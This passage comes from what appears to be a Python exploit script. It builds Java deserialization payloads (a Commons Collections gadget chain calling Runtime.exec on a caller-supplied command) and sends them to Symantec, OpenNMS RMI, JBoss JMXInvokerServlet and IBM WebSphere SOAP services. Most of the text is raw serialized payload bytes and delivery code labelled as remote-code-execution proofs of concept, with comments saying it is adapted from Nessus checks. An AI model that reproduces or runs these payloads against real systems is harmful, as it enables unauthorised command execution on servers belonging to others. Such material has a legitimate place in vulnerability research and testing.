x7b\x47\x02\x00\x00\x78\x70\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x01\x75\x71\x00\x7e\x00\x20\x00\x00\x00\x03\x74\x00\x07\x63\x6d\x64\x2e\x65\x78\x65\x74\x00\x02\x2f\x63\x74\x00'
cleng = len(_cmd)
java_payload += chr(cleng) + _cmd
java_payload += '\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a'
fullpayload = """------=_Part_0_992568364.1449677528532
Content-Type: application/binary
Content-Disposition: form-data; name="Content"
%s
------=_Part_0_992568364.1449677528532--
""" % java_payload
if SSL_On:
webservice = httplib2.Http(disable_ssl_certificate_validation=True)
URL_ADDR = "%s://%s:%s" % ('https',HOST,PORT)
else:
webservice = httplib2.Http()
URL_ADDR = "%s://%s:%s" % ('http',HOST,PORT)
headers = {"User-Agent":"Symantec_RCE_POC",
"Content-type":"multipart/form-data;",
"boundary":"----=_Part_0_992568364.1449677528532",
"Accept":"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n",
"Connection":"keep-alive",
"Content-length":"%d" % len(fullpayload)
}
resp, content = webservice.request(URL_ADDR+"/servlet/ConsoleServlet?ActionType=SendStatPing", "POST", body=fullpayload, headers=headers)
# print provided response.
print("[i] Response received from target: %s" % resp)
def opennms_attack(HOST, PORT, _cmd):
# The below code is based on the opennms_java_serialize.nasl script within Nessus
"""
This function sets up the attack payload for OpenNMS
"""
clen = len(_cmd)
d1 = '\x4a\x52\x4d\x49\x00\x02\x4b'
d2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74'
d2 += '\x00' + chr(clen)
d2 += _cmd
d2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
print("[i] Sending initial packets to OpenNMS RMI service")
s.sendall(d1)
retdata = s.recv(8192)
if retdata:
#
# We have received some data suggesting the OpenNMS RMI Registry has responded.
# Time to exploit.
#
print("[+] OpenNMS RMI service responded. Sending the exploit code...")
s.sendall(d2)
else:
print("[-] Sorry, the RMI service didnt respond. Revert to manual attack.")
return 0
def jboss_attack(HOST, PORT, SSL_On, _cmd):
# The below code is based on the jboss_java_serialize.nasl script within Nessus
"""
This function sets up the attack payload for JBoss
"""
body_serObj = hex2raw3("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400")
cleng = len(_cmd)
body_serObj += chr(cleng) + _cmd
body_serObj += hex2raw3("740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A")
if SSL_On:
webservice = httplib2.Http(disable_ssl_certificate_validation=True)
URL_ADDR = "%s://%s:%s" % ('https',HOST,PORT)
else:
webservice = httplib2.Http()
URL_ADDR = "%s://%s:%s" % ('http',HOST,PORT)
headers = {"User-Agent":"JBoss_RCE_POC",
"Content-type":"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Content-length":"%d" % len(body_serObj)
}
resp, content = webservice.request(URL_ADDR+"/invoker/JMXInvokerServlet", "POST", body=body_serObj, headers=headers)
# print provided response.
print("[i] Response received from target: %s" % resp)
def websphere_attack(HOST, PORT, SSL_On, _cmd):
# The below code is based on the websphere_java_serialize.nasl script within Nessus
"""
This function sets up the attack payload for IBM WebSphere
"""
serObj3 = hex2raw3("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400") # Setup initial parts of the payload packet
cleng = len(_cmd) # Get the length of the payload
serObj3 += chr(cleng) + _cmd # Convert the length to byte string, prepend to the payload and concatenate with the serialised payload.
serObj3 += hex2raw3("740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A") # Complete the payload packet
serObjB64_3 = base64.b64encode(serObj3.encode('ascii', errors='ignore')) # Base64 encode the whole payload
body = """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header ns0:JMXConnectorContext="rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlw